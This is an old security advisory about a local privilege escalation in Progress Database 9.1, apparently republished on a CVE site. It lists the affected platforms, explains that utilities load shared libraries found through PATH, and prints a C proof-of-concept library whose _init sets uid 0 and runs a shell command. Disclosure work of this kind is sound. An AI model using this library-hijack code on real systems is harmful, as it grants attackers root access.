Progress Database Environment Variable Local Privilege Escalation Vulnerability

BID:7916

Info

Progress Database Environment Variable Local Privilege Escalation Vulnerability

Bugtraq ID: 7916
Class: Input Validation Error
CVE:
Remote: No
Local: Yes
Published: Jun 14 2003 12:00AM
Updated: Jun 14 2003 12:00AM
Credit: Discovery credited to KF.
Vulnerable: Progress Database 9.1 D06
Progress Database 9.1 D05
Progress Database 9.1 D
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Redhat Linux 7.1
- Redhat Linux 7.0
- Redhat Linux 6.2
- Sun Solaris 2.6
- SuSE Linux 7.2
Progress Database 9.1 C
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Redhat Linux 7.1
- Redhat Linux 7.0
- Redhat Linux 6.2
- Sun Solaris 2.6
- SuSE Linux 7.2
Progress Database 9.1 B
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Redhat Linux 7.1
- Redhat Linux 7.0
- Redhat Linux 6.2
- Sun Solaris 2.6
- SuSE Linux 7.2
Progress Database 9.1
Not Vulnerable:

Discussion

Progress Database Environment Variable Local Privilege Escalation Vulnerability

It has been reported that Progress database does not properly handle untrusted input when opening shared libraries. Specifically, the dlopen() function used by several Progress utilities checks the user's PATH environment variable when including shared object libraries. If any shared objects are found, Progress will load and execute them. Due to this, an attacker may be able to gain unauthorized privileges.

Any library code loaded will execute with elevated privileges.

Exploit / POC

Progress Database Environment Variable Local Privilege Escalation Vulnerability

The following proof of concept was provided:

#include <stdio.h>
#include <string.h>

// If you wanted to get creative you can hack out some fake functions for
// use later ... but theres no need... just use _init

int ehnLogOpen(int argc, char * const argv[], const char *optstring) {
printf("This is a fake ehnLogOpen \n");
}
int ehnLogClose(int argc, char * const argv[], const char *optstring) {
printf("This is a fake ehnLogClose\n");
}

_init() {
setuid(0);
setgid(0);
printf("bullshit library loaded\n");
system("/usr/bin/id > /tmp/p00p");
system("cat /tmp/p00p");
}

Solution / Fix

Progress Database Environment Variable Local Privilege Escalation Vulnerability

Solution:
It has been reported that this issue will be fixed in the 10 series of Progress database software. This has not been confirmed by the vendor.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Progress Database Environment Variable Local Privilege Escalation Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report